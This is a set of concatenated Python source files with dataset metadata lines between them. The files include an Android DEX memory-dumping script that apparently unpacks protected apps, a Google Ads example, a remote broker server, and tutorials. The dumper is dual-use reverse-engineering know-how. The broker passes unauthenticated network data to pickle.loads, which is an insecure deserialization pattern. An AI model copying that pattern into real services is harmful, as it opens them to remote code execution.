del mmu.page_table
gc.collect()
def init_DexFile():
# get the pointer that refers to the DexFile structure
dex_file_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
# read the "begin_" field
dex_file_begin_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
if config.debug:
print "[DexFile] begin_ = %0#10x" % dex_file_begin_val
# read the "size_" field
dex_file_size_val = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
if config.debug:
print "[DexFile] size_ = %#x" % dex_file_size_val
# read the "location_" field
dex_file_location_ptr = int(execution_state.getRegisterService().getValue("R3")) & 0xffffffff
# retrieve the value of the std::string structure
dex_file_location_string_val = retrieve_string_value(dex_file_location_ptr)
if config.debug:
print "[DexFile] location_ = %s" % dex_file_location_string_val
# if config.package_filter(dex_file_location_string_val) and dex_file_location_string_val.endswith("base.apk"):
if config.package_filter(dex_file_location_string_val):
pid_val = int(execution_state.getVariableService().readValue("$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
if config.debug:
print "[DexFile] pid = %#x" % pid_val
config.log_print("[DexFile] pid = %#x" % pid_val)
setup(pid_val)
# we only focus on the DexFile whose location is suspicious
if not config.package_filter(dex_file_location_string_val):
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
# # parse the header_item of the dex file
# header_item.parse_header_item(dex_file_begin_val)
# # calculate the "size_" value from the "map_off" field of the header_item
# dex_file_size_val_calc = 0x0
# if config.package_filter(dex_file_location_string_val):
# map_off = header_item.get_map_off(dex_file_begin_val)
# map_list_ptr = dex_file_begin_val + map_off
# map_list_size_val = memory.readMemory32(map_list_ptr + 0x0)
# dex_file_size_val_calc = map_off + (0x4) + map_list_size_val * (0x2 + 0x2 + 0x4 + 0x4)
# config.log_print("[DexFile] begin_ = %0#10x, size_ = %#x (inferring size = %#x), location_ = %s" % (dex_file_begin_val, dex_file_size_val, dex_file_size_val_calc, dex_file_location_string_val))
config.log_print("[DexFile] begin_ = %0#10x, size_ = %#x, location_ = %s" % (dex_file_begin_val, dex_file_size_val, dex_file_location_string_val))
config.save_dex_info(dex_file_begin_val, dex_file_size_val, dex_file_location_string_val.split("/")[-1])
# dump the in-memory DexFile
file_path = os.path.join(config.workspace, config.dex_directory, dex_file_location_string_val.split("/")[-1])
file_format = "binary"
file_vtl_start_address = dex_file_begin_val
file_vtl_end_address = dex_file_begin_val + dex_file_size_val - 0x1
file_path = memory.dump(file_path, file_format, file_vtl_start_address, file_vtl_end_address)
# unpack_baidu_2016(file_path, dex_file_begin_val, dex_file_size_val)
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
if __name__ == '__main__':
init_DexFile()
sys.exit()
| 58.584296
| 210
| 0.745772
|
1009a857c4f86a8bf8ea56d55ed9b106b3ced138
| 11,479
|
py
|
Python
|
examples/advanced_operations/add_dynamic_search_ads.py
|
andy0937/google-ads-python
|
cb5da7f4a75076828d1fc3524b08cc167670435a
|
[
"Apache-2.0"
] | 1
|
2019-11-30T23:42:39.000Z
|
2019-11-30T23:42:39.000Z
|
examples/advanced_operations/add_dynamic_search_ads.py
|
andy0937/google-ads-python
|
cb5da7f4a75076828d1fc3524b08cc167670435a
|
[
"Apache-2.0"
] | null | null | null |
examples/advanced_operations/add_dynamic_search_ads.py
|
andy0937/google-ads-python
|
cb5da7f4a75076828d1fc3524b08cc167670435a
|
[
"Apache-2.0"
] | 1
|
2020-09-30T17:04:06.000Z
|
2020-09-30T17:04:06.000Z
|
#!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example adds a new dynamic search ad (DSA).
It also creates a webpage targeting criteria for the DSA.
"""
import argparse
import sys
from uuid import uuid4
from datetime import datetime, timedelta
from google.ads.google_ads.client import GoogleAdsClient
from google.ads.google_ads.errors import GoogleAdsException
def main(client, customer_id):
"""The main method that creates all necessary entities for the example.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
"""
try:
budget_resource_name = create_budget(client, customer_id)
campaign_resource_name = create_campaign(client, customer_id,
budget_resource_name)
ad_group_resource_name = create_ad_group(client, customer_id,
campaign_resource_name)
create_expanded_dsa(client, customer_id, ad_group_resource_name)
add_webpage_criterion(client, customer_id, ad_group_resource_name)
except GoogleAdsException as ex:
print(f'Request with ID "{ex.request_id}" failed with status '
f'"{ex.error.code().name}" and includes the following errors:')
for error in ex.failure.errors:
print(f'\tError with message "{error.message}".')
if error.location:
for field_path_element in error.location.field_path_elements:
print(f'\t\tOn field: {field_path_element.field_name}')
sys.exit(1)
def create_budget(client, customer_id):
"""Creates a budget under the given customer ID.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
Returns:
A resource_name str for the newly created Budget.
"""
# Creates a campaign budget operation.
campaign_budget_operation = client.get_type('CampaignBudgetOperation',
version='v3')
# Issues a mutate request to add campaign budgets.
campaign_budget = campaign_budget_operation.create
campaign_budget.name.value = f'Interplanetary Cruise #{uuid4()}'
campaign_budget.amount_micros.value = 50000000
campaign_budget.delivery_method = client.get_type(
'BudgetDeliveryMethodEnum', version='v3').STANDARD
# Retrieve the campaign budget service.
campaign_budget_service = client.get_service('CampaignBudgetService',
version='v3')
# Submit the campaign budget operation to add the campaign budget.
response = campaign_budget_service.mutate_campaign_budgets(
customer_id, [campaign_budget_operation])
resource_name = response.results[0].resource_name
print(f'Created campaign budget with resource_name: "{resource_name}"')
return resource_name
def create_campaign(client, customer_id, budget_resource_name):
"""Creates a Dynamic Search Ad Campaign under the given customer ID.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
budget_resource_name: a resource_name str for a Budget
Returns:
A resource_name str for the newly created Campaign.
"""
# Retrieve a new campaign operation object.
campaign_operation = client.get_type('CampaignOperation', version='v3')
campaign = campaign_operation.create
campaign.name.value = f'Interplanetary Cruise #{uuid4()}'
campaign.advertising_channel_type = client.get_type(
'AdvertisingChannelTypeEnum', version='v3').SEARCH
# Recommendation: Set the campaign to PAUSED when creating it to prevent the
# ads from immediately serving. Set to ENABLED once you've added targeting
# and the ads are ready to serve.
campaign.status = client.get_type('CampaignStatusEnum',
version='v3').PAUSED
campaign.manual_cpc.enhanced_cpc_enabled.value = True
campaign.campaign_budget.value = budget_resource_name
# Required: Enable the campaign for DSAs by setting the campaign's dynamic
# search ads setting domain name and language.
campaign.dynamic_search_ads_setting.domain_name.value = 'example.com'
campaign.dynamic_search_ads_setting.language_code.value = 'en'
    # Optional: Sets the start and end dates for the campaign, starting today
    # and ending one year from now.
campaign.start_date.value = datetime.now().strftime('%Y%m%d')
campaign.end_date.value = (
datetime.now() + timedelta(days=365)).strftime('%Y%m%d')
# Retrieve the campaign service.
campaign_service = client.get_service('CampaignService', version='v3')
# Issues a mutate request to add campaign.
response = campaign_service.mutate_campaigns(
customer_id, [campaign_operation])
resource_name = response.results[0].resource_name
print(f'Created campaign with resource_name: "{resource_name}"')
return resource_name
def create_ad_group(client, customer_id, campaign_resource_name):
"""Creates a Dynamic Search Ad Group under the given Campaign.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
campaign_resource_name: a resource_name str for a Campaign.
Returns:
A resource_name str for the newly created Ad Group.
"""
# Retrieve a new ad group operation object.
ad_group_operation = client.get_type('AdGroupOperation', version='v3')
# Create an ad group.
ad_group = ad_group_operation.create
# Required: set the ad group's type to Dynamic Search Ads.
ad_group.type = client.get_type('AdGroupTypeEnum',
version='v3').SEARCH_DYNAMIC_ADS
ad_group.name.value = f'Earth to Mars Cruises {uuid4()}'
ad_group.campaign.value = campaign_resource_name
ad_group.status = client.get_type('AdGroupStatusEnum', version='v3').PAUSED
# Recommended: set a tracking URL template for your ad group if you want to
# use URL tracking software.
ad_group.tracking_url_template.value = (
'http://tracker.example.com/traveltracker/{escapedlpurl}')
# Optional: Set the ad group bid value.
ad_group.cpc_bid_micros.value = 10000000
# Retrieve the ad group service.
ad_group_service = client.get_service('AdGroupService', version='v3')
# Issues a mutate request to add the ad group.
response = ad_group_service.mutate_ad_groups(customer_id,
[ad_group_operation])
resource_name = response.results[0].resource_name
print(f'Created Ad Group with resource_name: "{resource_name}"')
return resource_name
def create_expanded_dsa(client, customer_id, ad_group_resource_name):
"""Creates a dynamic search ad under the given ad group.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
ad_group_resource_name: a resource_name str for an Ad Group.
"""
# Retrieve a new ad group ad operation object.
ad_group_ad_operation = client.get_type('AdGroupAdOperation', version='v3')
    # Create an expanded dynamic search ad. This ad will have its headline,
# display URL and final URL auto-generated at serving time according to
# domain name specific information provided by DynamicSearchAdSetting at
# the campaign level.
ad_group_ad = ad_group_ad_operation.create
# Optional: set the ad status.
ad_group_ad.status = client.get_type('AdGroupAdStatusEnum',
version='v3').PAUSED
# Set the ad description.
ad_group_ad.ad.expanded_dynamic_search_ad.description.value = (
'Buy tickets now!')
ad_group_ad.ad_group.value = ad_group_resource_name
# Retrieve the ad group ad service.
ad_group_ad_service = client.get_service('AdGroupAdService', version='v3')
# Submit the ad group ad operation to add the ad group ad.
response = ad_group_ad_service.mutate_ad_group_ads(customer_id,
[ad_group_ad_operation])
resource_name = response.results[0].resource_name
print(f'Created Ad Group Ad with resource_name: "{resource_name}"')
def add_webpage_criterion(client, customer_id, ad_group_resource_name):
"""Creates a web page criterion to the given ad group.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID str.
ad_group_resource_name: a resource_name str for an Ad Group.
"""
# Retrieve a new ad group criterion operation.
ad_group_criterion_operation = client.get_type(
'AdGroupCriterionOperation', version='v3')
# Create an ad group criterion for special offers for Mars Cruise.
criterion = ad_group_criterion_operation.create
criterion.ad_group.value = ad_group_resource_name
# Optional: set custom bid amount.
criterion.cpc_bid_micros.value = 10000000
# Optional: set the status.
criterion.status = client.get_type(
'AdGroupCriterionStatusEnum', version='v3').PAUSED
# Sets the criterion to match a specific page URL and title.
criterion.webpage.criterion_name.value = 'Special Offers'
webpage_info_url = criterion.webpage.conditions.add()
webpage_info_url.operand = client.get_type(
'WebpageConditionOperandEnum', version='v3').URL
webpage_info_url.argument.value = '/specialoffers'
webpage_info_page_title = criterion.webpage.conditions.add()
webpage_info_page_title.operand = client.get_type(
'WebpageConditionOperandEnum', version='v3').PAGE_TITLE
webpage_info_page_title.argument.value = 'Special Offer'
# Retrieve the ad group criterion service.
ad_group_criterion_service = client.get_service('AdGroupCriterionService',
version='v3')
# Issues a mutate request to add the ad group criterion.
response = ad_group_criterion_service.mutate_ad_group_criteria(
customer_id, [ad_group_criterion_operation])
resource_name = response.results[0].resource_name
print(f'Created Ad Group Criterion with resource_name: "{resource_name}"')
if __name__ == '__main__':
# GoogleAdsClient will read the google-ads.yaml configuration file in the
# home directory if none is specified.
google_ads_client = GoogleAdsClient.load_from_storage()
parser = argparse.ArgumentParser(
description=(
'Adds a dynamic search ad under the specified customer ID.'))
# The following argument(s) should be provided to run the example.
parser.add_argument('-c', '--customer_id', type=str,
required=True, help='The Google Ads customer ID.')
args = parser.parse_args()
main(google_ads_client, args.customer_id)
| 43.154135
| 80
| 0.706769
|
19ab3ebfa64027bf2c66726ecc920de4389e04e0
| 453
|
py
|
Python
|
BOOK/MAIN/02-strings-lists-tuples-dictionaries/chapter-2-examples/06-linear-search.py
|
kabirsrivastava3/python-practice
|
f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5
|
[
"MIT"
] | null | null | null |
BOOK/MAIN/02-strings-lists-tuples-dictionaries/chapter-2-examples/06-linear-search.py
|
kabirsrivastava3/python-practice
|
f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5
|
[
"MIT"
] | null | null | null |
BOOK/MAIN/02-strings-lists-tuples-dictionaries/chapter-2-examples/06-linear-search.py
|
kabirsrivastava3/python-practice
|
f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5
|
[
"MIT"
] | null | null | null |
#search for key in the dictionary and print the corresponding value
#Time Complexity = O(N)
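#A direct dictionary lookup (inform[key] or inform.get(key)) would be O(1); the loop below walks the keys to illustrate a linear search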
def input(element):
return element
def findValue(inform, key):
    #Walk the keys one by one (linear search) and return the value stored for key
    for search in inform:
        if search == key:
            return inform[search]
    return None
find = input("Ishpreet")
print(find)
info = {"Riya":"Csc.", "Mark":"Eco", "Ishpreet":"Eng", "Kamaal":"Env. Sc"}
output = findValue(info,find)
print(output)
| 22.65
| 74
| 0.613687
|
f967ec4e0e60b8d7590d116165faf624612733e6
| 799
|
py
|
Python
|
Lib/corpuscrawler/crawl_yut.py
|
cash/corpuscrawler
|
8913fe1fb2b6bfdfbf2ba01d2ce88057b3b5ba3d
|
[
"Apache-2.0"
] | 95
|
2019-06-13T23:34:21.000Z
|
2022-03-12T05:22:49.000Z
|
Lib/corpuscrawler/crawl_yut.py
|
sahwar/corpuscrawler
|
8913fe1fb2b6bfdfbf2ba01d2ce88057b3b5ba3d
|
[
"Apache-2.0"
] | 31
|
2019-06-02T18:56:53.000Z
|
2021-08-10T20:16:02.000Z
|
Lib/corpuscrawler/crawl_yut.py
|
sahwar/corpuscrawler
|
8913fe1fb2b6bfdfbf2ba01d2ce88057b3b5ba3d
|
[
"Apache-2.0"
] | 35
|
2019-06-18T08:26:24.000Z
|
2022-01-11T13:59:40.000Z
|
# coding: utf-8
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function, unicode_literals
import re
def crawl(crawler):
out = crawler.get_output(language='yut')
crawler.crawl_pngscriptures_org(out, language='yut')
| 34.73913
| 74
| 0.764706
|
0ce3cbf0db2e0a1fcb33a029f7ae581085246fc6
| 3,188
|
py
|
Python
|
pykeval/pykeval/broker/remote_server.py
|
SilverTuxedo/keval
|
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
|
[
"MIT"
] | 34
|
2021-09-17T16:17:58.000Z
|
2022-03-11T06:23:21.000Z
|
pykeval/pykeval/broker/remote_server.py
|
fengjixuchui/keval
|
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
|
[
"MIT"
] | null | null | null |
pykeval/pykeval/broker/remote_server.py
|
fengjixuchui/keval
|
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
|
[
"MIT"
] | 4
|
2021-09-17T19:39:29.000Z
|
2022-03-10T07:06:43.000Z
|
import logging
import pickle
from socketserver import BaseRequestHandler, TCPServer
from pykeval.broker.local import LocalBroker
from pykeval.broker.requests import BrokerResponse, BrokerResponseType, BrokerRequest, BrokerRequestType
from pykeval.broker.messaging import receive, send
logger = logging.getLogger(__name__)
class BrokerRequestHandler(BaseRequestHandler):
broker_server = None
def handle(self) -> None:
logger.info(f"Got connection from {self.client_address}")
data = receive(self.request)
logger.debug("Received")
try:
request = pickle.loads(data)
# noinspection PyProtectedMember
response_data = self.__class__.broker_server._on_new_request(request)
response = BrokerResponse(BrokerResponseType.SUCCESS, response_data)
except Exception as e:
logger.exception("Error processing request")
response = BrokerResponse(BrokerResponseType.EXCEPTION, e)
logger.debug("Serializing and sending response")
serialized_response = pickle.dumps(response)
send(self.request, serialized_response)
logger.info(f"Sent response to {self.client_address}")
class RemoteBrokerServer:
"""
A broker server based on a local broker over TCP. This works together with `RemoteBroker` to allow running code on a
different machine than the client itself.
"""
def __init__(self, local_broker: LocalBroker, address: str, port: int):
"""
:param local_broker: The actual local broker that will handle requests
:param address: The address of the server
:param port: The port of the server
"""
self._local_broker = local_broker
self._address = address
self._port = port
def start(self):
"""
Starts the TCP server.
"""
handler_type = type("BoundBrokerRequestHandler", (BrokerRequestHandler,), {"broker_server": self})
with TCPServer((self._address, self._port), handler_type) as server:
logger.info(f"Starting server at {self._address}:{self._port}")
server.serve_forever()
def _on_new_request(self, request: BrokerRequest):
"""
Handles a broker request.
:return: What the local broker returned for the request
:raises ValueError if the request type is not supported.
"""
# No-data requests
if request.type == BrokerRequestType.GET_POINTER_SIZE:
return self._local_broker.get_pointer_size()
# Data requests
try:
handler = {
BrokerRequestType.CALL_FUNCTION: self._local_broker.call_function,
BrokerRequestType.READ_BYTES: self._local_broker.read_bytes,
BrokerRequestType.WRITE_BYTES: self._local_broker.write_bytes,
BrokerRequestType.ALLOCATE: self._local_broker.allocate,
BrokerRequestType.FREE: self._local_broker.free
}[request.type]
return handler(request.data)
except KeyError:
pass
raise ValueError(f"Unrecognized request type {request.type.value}")
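# Minimal usage sketch (the LocalBroker construction arguments and the port below
# are illustrative assumptions, not defined in this module):
#
#   broker = LocalBroker(...)
#   RemoteBrokerServer(broker, "0.0.0.0", 4455).start()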
| 35.820225
| 120
| 0.67064
|
4dcb9fcf60bb8270025fbfbcb309d7e6e03ebeb0
| 687
|
py
|
Python
|
Ch04. Recursion/is-palindrome.py
|
melfag/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python
|
59b99b2ed439c5e2a97a364d1e743e36f0bf1ee3
|
[
"MIT"
] | 1
|
2020-07-21T11:29:39.000Z
|
2020-07-21T11:29:39.000Z
|
Ch04. Recursion/is-palindrome.py
|
melfag/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python
|
59b99b2ed439c5e2a97a364d1e743e36f0bf1ee3
|
[
"MIT"
] | null | null | null |
Ch04. Recursion/is-palindrome.py
|
melfag/Problem-Solving-with-Algorithms-and-Data-Structures-using-Python
|
59b99b2ed439c5e2a97a364d1e743e36f0bf1ee3
|
[
"MIT"
] | null | null | null |
def isPalindrome(string: str)->bool:
if len(string) < 2:
return True
else:
if string[0] == string[len(string) - 1]:
return isPalindrome(string[1: len(string) - 1])
else:
return False
print(isPalindrome('kayak'))
print(isPalindrome('aibohphobia'))
# no slicing
def isPalindrome2(string: str, start: int, end: int)->bool:
if start >= end:
return True
else:
if string[start] == string[end]:
return isPalindrome2(string, start + 1, end - 1)
else:
return False
print(isPalindrome2('kayak', 0, len('kayak') - 1))
print(isPalindrome2('aibohphobia', 0, len('aibohphobia') - 1))
| 25.444444
| 62
| 0.58952
|
6d38432e97e50ca2b7c08b1e6f50631caa04a9fe
| 1,539
|
py
|
Python
|
awacs/route53domains.py
|
craigbruce/awacs
|
e1d0699409291f0ad586b86d6c55cfc54af70778
|
[
"BSD-2-Clause"
] | null | null | null |
awacs/route53domains.py
|
craigbruce/awacs
|
e1d0699409291f0ad586b86d6c55cfc54af70778
|
[
"BSD-2-Clause"
] | null | null | null |
awacs/route53domains.py
|
craigbruce/awacs
|
e1d0699409291f0ad586b86d6c55cfc54af70778
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2012-2013, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from aws import Action
service_name = 'Amazon Route53 Domains'
prefix = 'route53domains'
class Route53DomainsAction(Action):
def __init__(self, action=None):
self.prefix = prefix
self.action = action
CheckDomainAvailability = Route53DomainsAction("CheckDomainAvailability")
DeleteTagsForDomain = Route53DomainsAction("DeleteTagsForDomain")
DisableDomainAutoRenew = Route53DomainsAction("DisableDomainAutoRenew")
DisableDomainTransferLock = Route53DomainsAction("DisableDomainTransferLock")
EnableDomainAutoRenew = Route53DomainsAction("EnableDomainAutoRenew")
EnableDomainTransferLock = Route53DomainsAction("EnableDomainTransferLock")
GetDomainDetail = Route53DomainsAction("GetDomainDetail")
GetOperationDetail = Route53DomainsAction("GetOperationDetail")
ListDomains = Route53DomainsAction("ListDomains")
ListOperations = Route53DomainsAction("ListOperations")
ListTagsForDomain = Route53DomainsAction("ListTagsForDomain")
RegisterDomain = Route53DomainsAction("RegisterDomain")
RetrieveDomainAuthCode = Route53DomainsAction("RetrieveDomainAuthCode")
TransferDomain = Route53DomainsAction("TransferDomain")
UpdateDomainContact = Route53DomainsAction("UpdateDomainContact")
UpdateDomainContactPrivacy = Route53DomainsAction("UpdateDomainContactPrivacy")
UpdateDomainNameservers = Route53DomainsAction("UpdateDomainNameservers")
UpdateTagsForDomains = Route53DomainsAction("UpdateTagsForDomains")
| 42.75
| 79
| 0.841455
|
b8493734b0b43009984763955820502d07cfb7d7
| 4,993
|
py
|
Python
|
spotpy/examples/tutorial_padds_hymod.py
|
hpsone/spotpy
|
34d1ad306b6f2f8faa95f010e6c4db98be76efaa
|
[
"MIT"
] | 1
|
2020-06-17T17:35:25.000Z
|
2020-06-17T17:35:25.000Z
|
spotpy/examples/tutorial_padds_hymod.py
|
YinZhaokai/spotpy
|
4b4eec4f3544dd710e5c823de9c351b077ce0d04
|
[
"MIT"
] | null | null | null |
spotpy/examples/tutorial_padds_hymod.py
|
YinZhaokai/spotpy
|
4b4eec4f3544dd710e5c823de9c351b077ce0d04
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Copyright 2015 by Tobias Houska
This file is part of Statistical Parameter Estimation Tool (SPOTPY).
:author: Tobias Houska
This class holds example code how to use the dream algorithm
'''
import numpy as np
try:
import spotpy
except ImportError:
import sys
sys.path.append(".")
import spotpy
from spotpy.examples.spot_setup_hymod_python_pareto import spot_setup
import pylab as plt
if __name__ == "__main__":
    parallel = 'seq'  # Runs everything in sequential mode
    np.random.seed(2000)  # Makes the results reproducible
    # Initialize the Hymod example
    # In this case, we tell the setup which algorithm we want to use, so
    # we can use this example for different algorithms
spot_setup=spot_setup()
#Select number of maximum allowed repetitions
rep=3000
    # Create the PADDS sampler of spotpy; SPOTPY will call the objectivefunction
    # defined in the spot_setup class (the default would otherwise be
    # spotpy.objectivefunctions.rmse)
sampler=spotpy.algorithms.padds(spot_setup, dbname='padds_hymod', dbformat='csv')
    # Start the sampler; additional algorithm-specific options can be passed if desired
print(sampler.sample(rep, metric="crowd_distance"))
    # Load the results gained with the padds sampler, stored in padds_hymod.csv
#results = spotpy.analyser.load_csv_results('DDS_hymod')
results = sampler.getdata()
from pprint import pprint
#pprint(results)
pprint(results['chain'])
for likno in range(1,5):
fig_like1 = plt.figure(1,figsize=(9,5))
plt.plot(results['like'+str(likno)])
plt.show()
fig_like1.savefig('hymod_padds_objectivefunction_' + str(likno) + '.png', dpi=300)
plt.ylabel('RMSE')
plt.xlabel('Iteration')
# Example plot to show the parameter distribution ######
fig= plt.figure(2,figsize=(9,9))
normed_value = 1
plt.subplot(5,2,1)
x = results['parcmax']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1) #Ignores burn-in chain
plt.plot(x[index],'.')
plt.ylabel('cmax')
plt.ylim(spot_setup.cmax.minbound, spot_setup.cmax.maxbound)
plt.subplot(5,2,2)
x = x[int(len(results)*0.9):] #choose the last 10% of the sample
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('cmax')
plt.xlim(spot_setup.cmax.minbound, spot_setup.cmax.maxbound)
plt.subplot(5,2,3)
x = results['parbexp']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('bexp')
plt.ylim(spot_setup.bexp.minbound, spot_setup.bexp.maxbound)
plt.subplot(5,2,4)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('bexp')
plt.xlim(spot_setup.bexp.minbound, spot_setup.bexp.maxbound)
plt.subplot(5,2,5)
x = results['paralpha']
print(x)
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('alpha')
plt.ylim(spot_setup.alpha.minbound, spot_setup.alpha.maxbound)
plt.subplot(5,2,6)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('alpha')
plt.xlim(spot_setup.alpha.minbound, spot_setup.alpha.maxbound)
plt.subplot(5,2,7)
x = results['parKs']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('Ks')
plt.ylim(spot_setup.Ks.minbound, spot_setup.Ks.maxbound)
plt.subplot(5,2,8)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('Ks')
plt.xlim(spot_setup.Ks.minbound, spot_setup.Ks.maxbound)
plt.subplot(5,2,9)
x = results['parKq']
for i in range(int(max(results['chain'])-1)):
index=np.where(results['chain']==i+1)
plt.plot(x[index],'.')
plt.ylabel('Kq')
plt.ylim(spot_setup.Kq.minbound, spot_setup.Kq.maxbound)
plt.xlabel('Iterations')
plt.subplot(5,2,10)
x = x[int(len(results)*0.9):]
hist, bins = np.histogram(x, bins=20, density=True)
widths = np.diff(bins)
hist *= normed_value
plt.bar(bins[:-1], hist, widths)
plt.ylabel('Kq')
plt.xlabel('Parameter range')
plt.xlim(spot_setup.Kq.minbound, spot_setup.Kq.maxbound)
plt.show()
fig.savefig('hymod_parameters.png',dpi=300)
| 30.445122
| 90
| 0.639495
|
45233dfc05fd7951089c6b29bd23ca2f8fdef0c3
| 27,930
|
py
|
Python
|
onnxruntime/python/tools/transformers/onnx_model.py
|
sriduth/onnxruntime
|
b2da700e4d953239833e40f9a1b39b15936cc6dd
|
[
"MIT"
] | 1
|
2019-01-15T18:10:37.000Z
|
2019-01-15T18:10:37.000Z
|
onnxruntime/python/tools/transformers/onnx_model.py
|
sriduth/onnxruntime
|
b2da700e4d953239833e40f9a1b39b15936cc6dd
|
[
"MIT"
] | null | null | null |
onnxruntime/python/tools/transformers/onnx_model.py
|
sriduth/onnxruntime
|
b2da700e4d953239833e40f9a1b39b15936cc6dd
|
[
"MIT"
] | 1
|
2021-03-08T18:50:34.000Z
|
2021-03-08T18:50:34.000Z
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#--------------------------------------------------------------------------
from typing import List, Tuple
import logging
import os
import sys
import argparse
from pathlib import Path
import numpy as np
from collections import deque
from onnx import ModelProto, TensorProto, numpy_helper, helper, external_data_helper, save_model
logger = logging.getLogger(__name__)
class OnnxModel:
def __init__(self, model):
self.model = model
self.node_name_counter = {}
def input_name_to_nodes(self):
input_name_to_nodes = {}
for node in self.model.graph.node:
for input_name in node.input:
if input_name not in input_name_to_nodes:
input_name_to_nodes[input_name] = [node]
else:
input_name_to_nodes[input_name].append(node)
return input_name_to_nodes
def output_name_to_node(self):
output_name_to_node = {}
for node in self.model.graph.node:
for output_name in node.output:
output_name_to_node[output_name] = node
return output_name_to_node
def nodes(self):
return self.model.graph.node
def graph(self):
return self.model.graph
def remove_node(self, node):
if node in self.model.graph.node:
self.model.graph.node.remove(node)
def remove_nodes(self, nodes_to_remove):
for node in nodes_to_remove:
self.remove_node(node)
def add_node(self, node):
self.model.graph.node.extend([node])
def add_nodes(self, nodes_to_add):
self.model.graph.node.extend(nodes_to_add)
def add_initializer(self, tensor):
self.model.graph.initializer.extend([tensor])
def add_input(self, input):
self.model.graph.input.extend([input])
@staticmethod
def replace_node_input(node, old_input_name, new_input_name):
assert isinstance(old_input_name, str) and isinstance(new_input_name, str)
for j in range(len(node.input)):
if node.input[j] == old_input_name:
node.input[j] = new_input_name
def replace_input_of_all_nodes(self, old_input_name, new_input_name):
for node in self.model.graph.node:
OnnxModel.replace_node_input(node, old_input_name, new_input_name)
@staticmethod
def replace_node_output(node, old_output_name, new_output_name):
assert isinstance(old_output_name, str) and isinstance(new_output_name, str)
for j in range(len(node.output)):
if node.output[j] == old_output_name:
node.output[j] = new_output_name
def replace_output_of_all_nodes(self, old_output_name, new_output_name):
for node in self.model.graph.node:
OnnxModel.replace_node_output(node, old_output_name, new_output_name)
def get_initializer(self, name):
for tensor in self.model.graph.initializer:
if tensor.name == name:
return tensor
return None
def get_nodes_by_op_type(self, op_type):
return [n for n in self.model.graph.node if n.op_type == op_type]
def get_children(self, node, input_name_to_nodes=None):
if (input_name_to_nodes is None):
input_name_to_nodes = self.input_name_to_nodes()
children = []
for output in node.output:
if output in input_name_to_nodes:
for node in input_name_to_nodes[output]:
children.append(node)
return children
def get_parents(self, node, output_name_to_node=None):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
parents = []
for input in node.input:
if input in output_name_to_node:
parents.append(output_name_to_node[input])
return parents
def get_parent(self, node, i, output_name_to_node=None):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
if len(node.input) <= i:
return None
input = node.input[i]
if input not in output_name_to_node:
return None
return output_name_to_node[input]
def match_first_parent(self, node, parent_op_type, output_name_to_node, exclude=[]):
'''
Find parent node based on constraints on op_type.
Args:
node (str): current node name.
parent_op_type (str): constraint of parent node op_type.
output_name_to_node (dict): dictionary with output name as key, and node as value.
exclude (list): list of nodes that are excluded (not allowed to match as parent).
Returns:
parent: The matched parent node. None if not found.
index: The input index of matched parent node. None if not found.
'''
for i, input in enumerate(node.input):
if input in output_name_to_node:
parent = output_name_to_node[input]
if parent.op_type == parent_op_type and parent not in exclude:
return parent, i
else:
